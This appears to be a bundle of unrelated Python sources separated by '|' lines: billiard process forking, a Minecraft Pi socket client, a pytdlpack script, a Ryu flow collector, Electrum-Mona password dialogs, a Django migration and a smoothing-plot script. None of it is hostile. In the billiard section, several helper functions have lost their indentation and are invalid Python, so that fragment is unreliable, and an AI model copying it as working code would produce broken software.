                        # Translate our sentinel exit code to a SIGTERM-style
                        # negative return code.
                        code = -signal.SIGTERM
                    self.returncode = code
            return self.returncode
        def poll(self):
            return self.wait(timeout=0)
        def terminate(self):
            if self.returncode is None:
                try:
                    _subprocess.TerminateProcess(int(self._handle), TERMINATE)
                except WindowsError:
                    if self.wait(timeout=0.1) is None:
                        raise
#
#
#
if WINSERVICE:
    # Under pythonservice.exe, sys.executable is the service binary; spawn
    # children with the real interpreter next to it instead.
    _python_exe = os.path.join(sys.exec_prefix, 'python.exe')
else:
    _python_exe = sys.executable
def set_executable(exe):
    # Override the interpreter used to spawn children (multiprocessing API).
    global _python_exe
    _python_exe = exe
def is_forking(argv):
    '''
    Return whether commandline indicates we are forking
    '''
    if len(argv) < 2 or argv[1] != '--billiard-fork':
        return False
    # A forking command line is exactly: <prog> --billiard-fork <handle>
    assert len(argv) == 3
    os.environ["FORKED_BY_MULTIPROCESSING"] = "1"
    return True
def freeze_support():
    '''
    Run code for process object if this in not the main process
    '''
    # In a frozen child, run the bootstrap and never return to caller code.
    if is_forking(sys.argv):
        main()
        sys.exit()
def get_command_line():
    '''
    Returns prefix of command line used for spawning a child process
    '''
    # A child (empty _identity) whose argv already marks a fork means the
    # main module is being re-imported before bootstrap finished.
    if process.current_process()._identity == () and is_forking(sys.argv):
        raise RuntimeError('''
        Attempt to start a new process before the current process
        has finished its bootstrapping phase.
        This probably means that have forgotten to use the proper
        idiom in the main module:
            if __name__ == '__main__':
                freeze_support()
                ...
        The "freeze_support()" line can be omitted if the program
        is not going to be frozen to produce a Windows executable.''')
    if getattr(sys, 'frozen', False):
        # Frozen executables re-run themselves; -c is unavailable.
        return [sys.executable, '--billiard-fork']
    else:
        prog = 'from billiard.forking import main; main()'
        return [_python_exe, '-c', prog, '--billiard-fork']
def _Django_old_layout_hack__save():
    """Record the pre-Django-1.4 project directory in the environment so a
    spawned child can put it back on sys.path (see the __load counterpart)."""
    if 'DJANGO_PROJECT_DIR' not in os.environ:
        try:
            settings_name = os.environ['DJANGO_SETTINGS_MODULE']
        except KeyError:
            return  # not using Django.
        conf_settings = sys.modules.get('django.conf.settings')
        configured = conf_settings and conf_settings.configured
        try:
            project_name, _ = settings_name.split('.', 1)
        except ValueError:
            return  # not modified by setup_environ
        project = __import__(project_name)
        try:
            project_dir = os.path.normpath(_module_parent_dir(project))
        except AttributeError:
            return  # dynamically generated module (no __file__)
        if configured:
            warnings.warn(UserWarning(
                W_OLD_DJANGO_LAYOUT % os.path.realpath(project_dir)
            ))
        os.environ['DJANGO_PROJECT_DIR'] = project_dir
def _Django_old_layout_hack__load():
try:
sys.path.append(os.environ['DJANGO_PROJECT_DIR'])
except KeyError:
pass
def _module_parent_dir(mod):
dir, filename = os.path.split(_module_dir(mod))
if dir == os.curdir or not dir:
dir = os.getcwd()
return dir
def _module_dir(mod):
if '__init__.py' in mod.__file__:
return os.path.dirname(mod.__file__)
return mod.__file__
def main():
    '''
    Run code specifed by data received over pipe
    '''
    global _forking_is_enabled
    _Django_old_layout_hack__load()
    assert is_forking(sys.argv)
    # We are the spawned child; from here on, spawn rather than plain fork.
    _forking_is_enabled = False
    # Last argv element is the pipe handle/fd passed by the parent.
    handle = int(sys.argv[-1])
    if sys.platform == 'win32':
        fd = msvcrt.open_osfhandle(handle, os.O_RDONLY)
    else:
        fd = handle
    from_parent = os.fdopen(fd, 'rb')
    process.current_process()._inheriting = True
    # First pickle: environment/bootstrap info; second: the process object.
    preparation_data = load(from_parent)
    prepare(preparation_data)
    # Huge hack to make logging before Process.run work.
    try:
        os.environ["MP_MAIN_FILE"] = sys.modules["__main__"].__file__
    except KeyError:
        pass
    loglevel = os.environ.get("_MP_FORK_LOGLEVEL_")
    logfile = os.environ.get("_MP_FORK_LOGFILE_") or None
    format = os.environ.get("_MP_FORK_LOGFORMAT_")
    if loglevel:
        from billiard import util
        import logging
        logger = util.get_logger()
        logger.setLevel(int(loglevel))
        if not logger.handlers:
            logger._rudimentary_setup = True
            logfile = logfile or sys.__stderr__
            if hasattr(logfile, "write"):
                handler = logging.StreamHandler(logfile)
            else:
                handler = logging.FileHandler(logfile)
            formatter = logging.Formatter(
                format or util.DEFAULT_LOGGING_FORMAT)
            handler.setFormatter(formatter)
            logger.addHandler(handler)
    self = load(from_parent)
    process.current_process()._inheriting = False
    from_parent.close()
    # Run the process object's code and propagate its exit status.
    exitcode = self._bootstrap()
    exit(exitcode)
def get_preparation_data(name):
    '''
    Return info about parent needed by child to unpickle process object
    '''
    from billiard.util import _logger, _log_to_stderr
    d = dict(
        name=name,
        sys_path=sys.path,
        sys_argv=sys.argv,
        log_to_stderr=_log_to_stderr,
        orig_dir=process.ORIGINAL_DIR,
        authkey=process.current_process().authkey,
    )
    if _logger is not None:
        d['log_level'] = _logger.getEffectiveLevel()
    # Frozen exes and services have no importable __main__ file.
    if not WINEXE and not WINSERVICE:
        main_path = getattr(sys.modules['__main__'], '__file__', None)
        if not main_path and sys.argv[0] not in ('', '-c'):
            main_path = sys.argv[0]
        if main_path is not None:
            # Resolve relative paths against the parent's original cwd.
            if not os.path.isabs(main_path) and \
                    process.ORIGINAL_DIR is not None:
                main_path = os.path.join(process.ORIGINAL_DIR, main_path)
            d['main_path'] = os.path.normpath(main_path)
    return d
#
# Make (Pipe)Connection picklable
#
def reduce_connection(conn):
    """Reduce a (Pipe)Connection so a spawning child can inherit its handle.

    Only valid while this thread is spawning a child; otherwise the raw
    handle would be meaningless in the receiving process.
    """
    if not Popen.thread_is_spawning():
        raise RuntimeError(
            'By default %s objects can only be shared between processes\n'
            'using inheritance' % type(conn).__name__
        )
    return type(conn), (Popen.duplicate_for_child(conn.fileno()),
                        conn.readable, conn.writable)
ForkingPickler.register(Connection, reduce_connection)
# Match the earlier registration block: PipeConnection is falsy on
# non-Windows builds, so registering it unconditionally is useless.
if PipeConnection:
    ForkingPickler.register(PipeConnection, reduce_connection)
#
# Prepare current process
#
# Previous __main__ modules displaced by prepare(), kept alive deliberately.
old_main_modules = []
def prepare(data):
    '''
    Try to get current process ready to unpickle process object
    '''
    old_main_modules.append(sys.modules['__main__'])
    if 'name' in data:
        process.current_process().name = data['name']
    if 'authkey' in data:
        process.current_process()._authkey = data['authkey']
    if 'log_to_stderr' in data and data['log_to_stderr']:
        util.log_to_stderr()
    if 'log_level' in data:
        util.get_logger().setLevel(data['log_level'])
    if 'sys_path' in data:
        sys.path = data['sys_path']
    if 'sys_argv' in data:
        sys.argv = data['sys_argv']
    if 'dir' in data:
        os.chdir(data['dir'])
    if 'orig_dir' in data:
        process.ORIGINAL_DIR = data['orig_dir']
    if 'main_path' in data:
        # Re-import the parent's __main__ so its module-level definitions
        # exist here and pickles referencing them can be resolved.
        main_path = data['main_path']
        main_name = os.path.splitext(os.path.basename(main_path))[0]
        if main_name == '__init__':
            main_name = os.path.basename(os.path.dirname(main_path))
        if main_name == '__main__':
            main_module = sys.modules['__main__']
            main_module.__file__ = main_path
        elif main_name != 'ipython':
            # Main modules not actually called __main__.py may
            # contain additional code that should still be executed
            import imp
            if main_path is None:
                dirs = None
            elif os.path.basename(main_path).startswith('__init__.py'):
                dirs = [os.path.dirname(os.path.dirname(main_path))]
            else:
                dirs = [os.path.dirname(main_path)]
            assert main_name not in sys.modules, main_name
            file, path_name, etc = imp.find_module(main_name, dirs)
            try:
                # We would like to do "imp.load_module('__main__', ...)"
                # here.  However, that would cause 'if __name__ ==
                # "__main__"' clauses to be executed.
                main_module = imp.load_module(
                    '__parents_main__', file, path_name, etc
                )
            finally:
                if file:
                    file.close()
            sys.modules['__main__'] = main_module
            main_module.__name__ = '__main__'
            # Try to make the potentially picklable objects in
            # sys.modules['__main__'] realize they are in the main
            # module -- somewhat ugly.
            for obj in main_module.__dict__.values():
                try:
                    if obj.__module__ == '__parents_main__':
                        obj.__module__ = '__main__'
                except Exception:
                    pass
|
"""
This file has been taken from http://pi.minecraft.net/
"""
import socket
import select
import sys
from util import flatten_parameters_to_string
""" @author: Aron Nieminen, Mojang AB"""
class RequestError(Exception):
    """Raised when the game answers a request with Connection.RequestFailed."""
    pass
class Connection:
    """Connection to a Minecraft Pi game"""
    # Literal reply the game sends when a request could not be served.
    RequestFailed = "Fail"
    def __init__(self, address, port):
        # Plain TCP connection to the game's API server.
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((address, port))
        self.lastSent = ""
    def drain(self):
        """Drains the socket of incoming data"""
        while True:
            # Zero timeout: only consume data that is already buffered.
            readable, _, _ = select.select([self.socket], [], [], 0.0)
            if not readable:
                break
            data = self.socket.recv(1500)
            e = "Drained Data: <%s>\n"%data.strip()
            e += "Last Message: <%s>\n"%self.lastSent.strip()
            sys.stderr.write(e)
    def send(self, f, *data):
        """Sends data. Note that a trailing newline '\n' is added here"""
        # Wire format: functionName(flattened,args)\n
        s = "%s(%s)\n"%(f, flatten_parameters_to_string(data))
        #print "f,data:",f,data
        #print "s",s
        self.drain()
        self.lastSent = s
        # NOTE(review): sendall() with a str is Python-2 era; Python 3 would
        # require encoding to bytes — confirm the target interpreter.
        self.socket.sendall(s)
    def receive(self):
        """Receives data. Note that the trailing newline '\n' is trimmed"""
        # NOTE(review): makefile("r") builds a fresh buffered reader per call;
        # any bytes it over-reads are discarded between calls — confirm this
        # is acceptable for the protocol.
        s = self.socket.makefile("r").readline().rstrip("\n")
        if s == Connection.RequestFailed:
            raise RequestError("%s failed"%self.lastSent.strip())
        return s
    def sendReceive(self, *data):
        """Sends and receive data"""
        self.send(*data)
        return self.receive()
|
#!/usr/bin/env python3
# ----------------------------------------------------------------------------------------
# Import Modules
# ----------------------------------------------------------------------------------------
import numpy as np
import setuptools
import sys
# Point sys.path at the in-tree build directory for the current platform
# and interpreter so the freshly built pytdlpack is imported.
platform = setuptools.distutils.util.get_platform()
build_path = './build/lib.'+platform+'-'+str(sys.version_info.major)+'.'+str(sys.version_info.minor)
sys.path.insert(0,build_path)
import pytdlpack
# ----------------------------------------------------------------------------------------
# Create some data
# ----------------------------------------------------------------------------------------
nx = 2345
ny = 1597
date = 2019052900
# NOTE(review): `id` shadows the builtin; harmless in this script but rename
# if the code grows.
id = [4210008,10,24,0]
grid_data = np.random.rand(nx,ny)*75.0
# NOTE(review): fill() overwrites the random values just generated with NaN —
# the random draw only serves to allocate a float array; confirm an all-NaN
# (all-missing) grid is intended.
grid_data.fill(np.nan)
# ----------------------------------------------------------------------------------------
# Grid Specs: CONUS Lambert-Conformal 2.5km 2345x1597
# ----------------------------------------------------------------------------------------
griddef = pytdlpack.create_grid_definition(proj=3,nx=nx,ny=ny,latll=19.2290,
         lonll=233.7234,orientlon=265.,stdlat=25.,meshlength=2.539703)
# ----------------------------------------------------------------------------------------
# Create TDLPACK data record and pack
# ----------------------------------------------------------------------------------------
rec = pytdlpack.TdlpackRecord(date=date,id=id,lead=24,plain="GFS WIND SPEED",
      data=grid_data,missing_value=9999.0,grid=griddef)
rec.pack(dec_scale=3)
# ----------------------------------------------------------------------------------------
# Open new sequential file and write the records
# ----------------------------------------------------------------------------------------
f = pytdlpack.open('new_grid.sq',mode='w',format='sequential')
f.write(rec)
f.close()
# ----------------------------------------------------------------------------------------
# Open new random-access file and write the records
# ----------------------------------------------------------------------------------------
fra = pytdlpack.open('new_grid.ra',mode='w',format='random-access',ra_template='large')
fra.write(rec)
fra.close()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from ryu.base import app_manager
from ryu.ofproto import ofproto_v1_3
from command_sender import CommandSender
'''
###reduce_t###
--> flow collector
1) call rest_api and parse json
'''
class FlowCollector(app_manager.RyuApp):
    '''
    Flow-statistics collector for access switches: polls the controller's
    REST API and keeps per-dpid summaries of flows that match on a
    transport source port.
    '''
    OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]

    def __init__(self, *args, **kwargs):
        super(FlowCollector, self).__init__(*args, **kwargs)
        self.flowSender = CommandSender.get_instance()
        self.dpids = []
        # {dpid:[{"idle_timeout":...,"packet_count":...,"byte_count":...,},{},{},...],
        #  dpid:[{},{},{]...],...}
        self.dpid_to_flow = dict()

    def request_stats_switches(self):
        # List of switch dpids known to the controller.
        res = self.flowSender.get_stats_switches()
        return res.json()  # list

    def request_stats_flow(self, dpid):
        # Flow statistics for one switch.
        res = self.flowSender.get_stats_flow(dpid)
        return res.json()  # dict

    def parse_stats_flow(self, stats_flow):
        """Extract counters for flows matching on a transport source port.

        `key in dict` replaces the Python-2-only dict.has_key(), so this
        works on both interpreters.
        NOTE(review): "up_src" looks like a typo (udp_src?) in the
        original match keys -- preserved; confirm against the REST schema.
        """
        flow_list = list()
        for each_flow in stats_flow:
            match = each_flow["match"]
            if "tp_src" in match or "up_src" in match:
                flow = dict()
                flow["idle_timeout"] = each_flow["idle_timeout"]
                flow["packet_count"] = each_flow["packet_count"]
                flow["byte_count"] = each_flow["byte_count"]
                flow["duration_sec"] = each_flow["duration_sec"]
                flow["nw_src"] = match["nw_src"]
                flow["nw_dst"] = match["nw_dst"]
                flow_list.append(flow)
        return flow_list

    #---------------------Print_to_debug------------------------
    def print_stats(self):
        # Single-argument print(...) behaves identically on Python 2 and 3;
        # the original mixed print statements with print() calls.
        for each_dpid in self.dpid_to_flow:
            print("----------print_flow_collect_stats--------------")
            print("dpid:" + str(each_dpid))
            print("flow_num:" + str(len(self.dpid_to_flow[each_dpid])))
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import math
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QLineEdit, QLabel, QGridLayout, QVBoxLayout, QCheckBox
from electrum_mona.i18n import _
from electrum_mona.plugin import run_hook
from .util import (icon_path, WindowModalDialog, OkButton, CancelButton, Buttons,
PasswordLineEdit)
def check_password_strength(password):
    '''
    Check the strength of the password entered by the user and return back the same

    :param password: password entered by user in New Password
    :return: password strength Weak or Medium or Strong
    '''
    if not password:
        # len(set("")) == 0 would make math.log() raise ValueError; an
        # empty password is simply the weakest possible one.
        return "Weak"
    # Entropy-ish factor: log of the number of distinct characters used.
    n = math.log(len(set(password)))
    # Contains a digit, but is not digits-only.
    num = re.search("[0-9]", password) is not None and re.match("^[0-9]*$", password) is None
    # Mixed upper/lower case.
    caps = password != password.upper() and password != password.lower()
    # Contains at least one non-alphanumeric character.
    extra = re.match("^[a-zA-Z0-9]*$", password) is None
    score = len(password)*(n + caps + num + extra)/20
    password_strength = {0:"Weak",1:"Medium",2:"Strong",3:"Very Strong"}
    return password_strength[min(3, int(score))]
# Dialog kinds: create a new password, change an existing one, or enter
# a seed-extension passphrase.
PW_NEW, PW_CHANGE, PW_PASSPHRASE = range(0, 3)
class PasswordLayout(object):
    """Widget layout shared by the password and passphrase dialogs.

    ``kind`` selects the variant (PW_NEW / PW_CHANGE / PW_PASSPHRASE).
    The caller embeds ``layout()`` and reads the entered values back via
    old_password() / new_password().
    """

    titles = [_("Enter Password"), _("Change Password"), _("Enter Passphrase")]

    def __init__(self, msg, kind, OK_button, wallet=None, force_disable_encrypt_cb=False):
        self.wallet = wallet

        # Three fields: current password (only shown for PW_CHANGE on a
        # password-protected wallet), new password, and confirmation.
        self.pw = PasswordLineEdit()
        self.new_pw = PasswordLineEdit()
        self.conf_pw = PasswordLineEdit()
        self.kind = kind
        self.OK_button = OK_button

        vbox = QVBoxLayout()
        label = QLabel(msg + "\n")
        label.setWordWrap(True)

        grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnMinimumWidth(0, 150)
        grid.setColumnMinimumWidth(1, 100)
        grid.setColumnStretch(1,1)

        if kind == PW_PASSPHRASE:
            vbox.addWidget(label)
            msgs = [_('Passphrase:'), _('Confirm Passphrase:')]
        else:
            # Password dialogs get a lock/unlock icon next to the text.
            logo_grid = QGridLayout()
            logo_grid.setSpacing(8)
            logo_grid.setColumnMinimumWidth(0, 70)
            logo_grid.setColumnStretch(1,1)

            logo = QLabel()
            logo.setAlignment(Qt.AlignCenter)

            logo_grid.addWidget(logo, 0, 0)
            logo_grid.addWidget(label, 0, 1, 1, 2)
            vbox.addLayout(logo_grid)

            m1 = _('New Password:') if kind == PW_CHANGE else _('Password:')
            msgs = [m1, _('Confirm Password:')]

            if wallet and wallet.has_password():
                # Changing an existing password: ask for the current one.
                grid.addWidget(QLabel(_('Current Password:')), 0, 0)
                grid.addWidget(self.pw, 0, 1)
                lockfile = "lock.png"
            else:
                lockfile = "unlock.png"
            logo.setPixmap(QPixmap(icon_path(lockfile))
                           .scaledToWidth(36, mode=Qt.SmoothTransformation))

        grid.addWidget(QLabel(msgs[0]), 1, 0)
        grid.addWidget(self.new_pw, 1, 1)

        grid.addWidget(QLabel(msgs[1]), 2, 0)
        grid.addWidget(self.conf_pw, 2, 1)
        vbox.addLayout(grid)

        # Password Strength Label (not meaningful for passphrases).
        if kind != PW_PASSPHRASE:
            self.pw_strength = QLabel()
            grid.addWidget(self.pw_strength, 3, 0, 1, 2)
            self.new_pw.textChanged.connect(self.pw_changed)

        self.encrypt_cb = QCheckBox(_('Encrypt wallet file'))
        self.encrypt_cb.setEnabled(False)
        grid.addWidget(self.encrypt_cb, 4, 0, 1, 2)
        if kind == PW_PASSPHRASE:
            self.encrypt_cb.setVisible(False)

        def enable_OK():
            # OK only when both new-password fields agree; the encrypt
            # checkbox additionally requires a non-empty password.
            ok = self.new_pw.text() == self.conf_pw.text()
            OK_button.setEnabled(ok)
            self.encrypt_cb.setEnabled(ok and bool(self.new_pw.text())
                                       and not force_disable_encrypt_cb)
        self.new_pw.textChanged.connect(enable_OK)
        self.conf_pw.textChanged.connect(enable_OK)

        self.vbox = vbox

    def title(self):
        return self.titles[self.kind]

    def layout(self):
        return self.vbox

    def pw_changed(self):
        # Live strength feedback shown under the new-password field.
        password = self.new_pw.text()
        if password:
            colors = {"Weak":"Red", "Medium":"Blue", "Strong":"Green",
                      "Very Strong":"Green"}
            strength = check_password_strength(password)
            label = (_("Password Strength") + ": " + "<font color="
                     + colors[strength] + ">" + strength + "</font>")
        else:
            label = ""
        self.pw_strength.setText(label)

    def old_password(self):
        # Only meaningful when changing an existing password.
        if self.kind == PW_CHANGE:
            return self.pw.text() or None
        return None

    def new_password(self):
        pw = self.new_pw.text()
        # Empty passphrases are fine and returned empty.
        if pw == "" and self.kind != PW_PASSPHRASE:
            pw = None
        return pw

    def clear_password_fields(self):
        # Drop the entered secrets from the widgets as soon as possible.
        for field in [self.pw, self.new_pw, self.conf_pw]:
            field.clear()
class PasswordLayoutForHW(object):
    """Reduced layout for hardware wallets: no password fields, just the
    explanatory text and the 'Encrypt wallet file' checkbox."""

    def __init__(self, msg, wallet=None):
        self.wallet = wallet

        vbox = QVBoxLayout()
        label = QLabel(msg + "\n")
        label.setWordWrap(True)

        grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnMinimumWidth(0, 150)
        grid.setColumnMinimumWidth(1, 100)
        grid.setColumnStretch(1,1)

        logo_grid = QGridLayout()
        logo_grid.setSpacing(8)
        logo_grid.setColumnMinimumWidth(0, 70)
        logo_grid.setColumnStretch(1,1)

        logo = QLabel()
        logo.setAlignment(Qt.AlignCenter)

        logo_grid.addWidget(logo, 0, 0)
        logo_grid.addWidget(label, 0, 1, 1, 2)
        vbox.addLayout(logo_grid)

        # The lock icon reflects the current storage-encryption state.
        if wallet and wallet.has_storage_encryption():
            lockfile = "lock.png"
        else:
            lockfile = "unlock.png"
        logo.setPixmap(QPixmap(icon_path(lockfile))
                       .scaledToWidth(36, mode=Qt.SmoothTransformation))

        vbox.addLayout(grid)

        self.encrypt_cb = QCheckBox(_('Encrypt wallet file'))
        grid.addWidget(self.encrypt_cb, 1, 0, 1, 2)

        self.vbox = vbox

    def title(self):
        return _("Toggle Encryption")

    def layout(self):
        return self.vbox
class ChangePasswordDialogBase(WindowModalDialog):
    """Modal dialog shell for changing a wallet password.

    Subclasses implement create_password_layout() and must assign
    ``self.playout`` there.
    """

    def __init__(self, parent, wallet):
        WindowModalDialog.__init__(self, parent)
        is_encrypted = wallet.has_storage_encryption()
        OK_button = OkButton(self)

        # Template method: the subclass builds self.playout.
        self.create_password_layout(wallet, is_encrypted, OK_button)

        self.setWindowTitle(self.playout.title())
        vbox = QVBoxLayout(self)
        vbox.addLayout(self.playout.layout())
        vbox.addStretch(1)
        vbox.addLayout(Buttons(CancelButton(self), OK_button))
        self.playout.encrypt_cb.setChecked(is_encrypted)

    def create_password_layout(self, wallet, is_encrypted, OK_button):
        # Subclass hook; must set self.playout.
        raise NotImplementedError()
class ChangePasswordDialogForSW(ChangePasswordDialogBase):
    """Password add/change dialog for software (keystore) wallets."""

    def __init__(self, parent, wallet):
        ChangePasswordDialogBase.__init__(self, parent, wallet)
        if not wallet.has_password():
            self.playout.encrypt_cb.setChecked(True)

    def create_password_layout(self, wallet, is_encrypted, OK_button):
        # Pick the explanatory text matching the wallet's current state.
        if wallet.has_password():
            if is_encrypted:
                msg = _('Your wallet is password protected and encrypted.')
            else:
                msg = _('Your bitcoins are password protected. However, your wallet file is not encrypted.')
            msg += ' ' + _('Use this dialog to change your password.')
        else:
            msg = _('Your wallet is not protected.')
            msg += ' ' + _('Use this dialog to add a password to your wallet.')
        self.playout = PasswordLayout(
            msg=msg,
            kind=PW_CHANGE,
            OK_button=OK_button,
            wallet=wallet,
            force_disable_encrypt_cb=not wallet.can_have_keystore_encryption())

    def run(self):
        try:
            accepted = self.exec_()
            if not accepted:
                return False, None, None, None
            return (True,
                    self.playout.old_password(),
                    self.playout.new_password(),
                    self.playout.encrypt_cb.isChecked())
        finally:
            self.playout.clear_password_fields()
class ChangePasswordDialogForHW(ChangePasswordDialogBase):
    """Encryption-toggle dialog for hardware wallets (no password entry)."""

    def __init__(self, parent, wallet):
        ChangePasswordDialogBase.__init__(self, parent, wallet)

    def create_password_layout(self, wallet, is_encrypted, OK_button):
        msg = (_('Your wallet file is encrypted.') if is_encrypted
               else _('Your wallet file is NOT encrypted.'))
        msg += '\n' + _('Note: If you enable this setting, you will need your hardware device to open your wallet.')
        msg += '\n' + _('Use this dialog to toggle encryption.')
        self.playout = PasswordLayoutForHW(msg)

    def run(self):
        accepted = self.exec_()
        if not accepted:
            return False, None
        return True, self.playout.encrypt_cb.isChecked()
class PasswordDialog(WindowModalDialog):
    """Simple modal prompt for an existing password.

    run() returns the entered text, or None when the dialog is
    cancelled; the field is cleared afterwards either way.
    """

    def __init__(self, parent=None, msg=None):
        msg = msg or _('Please enter your password')
        WindowModalDialog.__init__(self, parent, _("Enter Password"))
        self.pw = pw = PasswordLineEdit()

        vbox = QVBoxLayout()
        vbox.addWidget(QLabel(msg))
        grid = QGridLayout()
        grid.setSpacing(8)
        grid.addWidget(QLabel(_('Password')), 1, 0)
        grid.addWidget(pw, 1, 1)
        vbox.addLayout(grid)

        vbox.addLayout(Buttons(CancelButton(self), OkButton(self)))
        self.setLayout(vbox)
        # Let plugins (e.g. a virtual keyboard) extend the dialog.
        run_hook('password_dialog', pw, grid, 1)

    def run(self):
        try:
            if not self.exec_():
                return
            return self.pw.text()
        finally:
            # Clear the secret from the widget regardless of outcome.
            self.pw.clear()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-18 15:27
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated by `makemigrations` (Django 1.10).  Do not restyle:
    # the operations here must stay in sync with the migration history.

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
import csv
import numpy as np
import matplotlib.pyplot as plt
def lookahead_moving_average(data, window):
    """Forward-looking moving average.

    Element i is the mean of data[i:i+window]; near the end of the series
    the window shrinks so the average only ever covers real samples.

    Fixes two defects of the original: it no longer mutates the caller's
    ``window`` argument, and a window larger than the data no longer
    raises IndexError (the slice simply clamps).

    :param data: 1-D sequence of numbers (non-empty).
    :param window: maximum number of samples to average, >= 1.
    :return: numpy float array with the same length as ``data``.
    """
    ma = []
    for i in range(len(data)):
        chunk = data[i:i + window]  # slice clamps at the end of data
        ma.append(sum(chunk) / float(len(chunk)))
    return np.array(ma, dtype=float)
def single_exp_smoothing(data, alpha):
    """Exponentially weighted smoothing with factor ``alpha``.

    The state is seeded with the first sample, so the first output value
    equals data[0].

    :param data: non-empty 1-D sequence.
    :param alpha: smoothing factor in [0, 1].
    :return: numpy float array, same length as ``data``.
    """
    state = data[0]
    smoothed = []
    for sample in data:
        state = alpha * sample + (1 - alpha) * state
        smoothed.append(state)
    return np.array(smoothed, dtype=float)
def double_exp_smoothing(data, alpha, gamma):
    """Holt's double (trend-aware) exponential smoothing.

    Level is seeded with data[0] and trend with data[1] - data[0], so the
    input must contain at least two samples.  Each output is the one-step
    forecast level + trend.

    :param data: sequence with len >= 2.
    :param alpha: level smoothing factor in [0, 1].
    :param gamma: trend smoothing factor in [0, 1].
    :return: numpy float array, same length as ``data``.
    """
    level = data[0]
    trend = data[1] - data[0]
    forecast = []
    for sample in data:
        new_level = alpha * sample + (1 - alpha) * level
        new_trend = gamma * (new_level - level) + (1 - gamma) * trend
        level, trend = new_level, new_trend
        forecast.append(new_level + new_trend)
    return np.array(forecast, dtype=float)
# ------------------------------------------------------------------
# Load the (time, value) dataset from data.csv and plot the residuals
# of each smoothing method in a five-panel figure.
# ------------------------------------------------------------------
d = []
with open('data.csv', 'r') as csvfile:
    reader = csv.reader(csvfile, delimiter=',')
    for row in reader:
        d.append(row)
dataset = np.array(d, dtype=float)
time = dataset[:, 0]
data = dataset[:, 1]

# Panel 1: residual of the look-ahead moving average.
plt.figure(1)
plt.subplot(511)
plt.title('lookahead moving average')  # (typo 'look head' fixed)
plt.plot(time, data, color='black', label='raw', lw=0.3)
ma = lookahead_moving_average(data, window=151)
plt.plot(time, data-ma, color='red', label='window=151', lw=1)
plt.ylabel('data')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)

# Panel 2: single exponential smoothing residuals for several alphas.
plt.subplot(512)
plt.title('single exponential smoothing')
colours = ['red', 'blue', 'green', 'yellow']
alphas = [0.2, 0.3, 0.5, 0.8]
plt.plot(time, data, color='black', label='raw', lw=0.3)
for i in range(len(alphas)):
    ses = single_exp_smoothing(data, alpha=alphas[i])
    a_label = 'alpha={}'.format(alphas[i])
    plt.plot(time, data-ses, color=colours[i], label=a_label)
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)

# Panels 3-5: double exponential smoothing residuals, one panel per
# alpha value, three gamma values per panel.
plt.subplot(513)
plt.title('double exponential smoothing for alpha = .2')
plt.plot(time, data, color='black', label='raw', lw=0.3)
des = double_exp_smoothing(data, 0.2, 0.2)
plt.plot(time, data-des, color='blue', label='.2, .2')
des = double_exp_smoothing(data, 0.2, 0.5)
plt.plot(time, data-des, color='green', label='.2, .5')
des = double_exp_smoothing(data, 0.2, 0.8)
plt.plot(time, data-des, color='red', label='.2, .8')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)

plt.subplot(514)
plt.title('double exponential smoothing for alpha = .5')
plt.plot(time, data, color='black', label='raw', lw=0.3)
des = double_exp_smoothing(data, 0.5, 0.2)
plt.plot(time, data-des, color='blue', label='.5, .2')
des = double_exp_smoothing(data, 0.5, 0.5)
plt.plot(time, data-des, color='green', label='.5, .5')
des = double_exp_smoothing(data, 0.5, 0.8)
plt.plot(time, data-des, color='red', label='.5, .8')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)

plt.subplot(515)
plt.title('double exponential smoothing for alpha = .8')
plt.plot(time, data, color='black', label='raw', lw=0.3)
des = double_exp_smoothing(data, 0.8, 0.2)
plt.plot(time, data-des, color='blue', label='.8, .2')
des = double_exp_smoothing(data, 0.8, 0.5)
plt.plot(time, data-des, color='green', label='.8, .5')
des = double_exp_smoothing(data, 0.8, 0.8)
# BUG FIX: this curve was mislabelled '.8, .5' (copy-paste error).
plt.plot(time, data-des, color='red', label='.8, .8')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)
plt.show()
|
from django.db import models
from django.template.defaultfilters import slugify
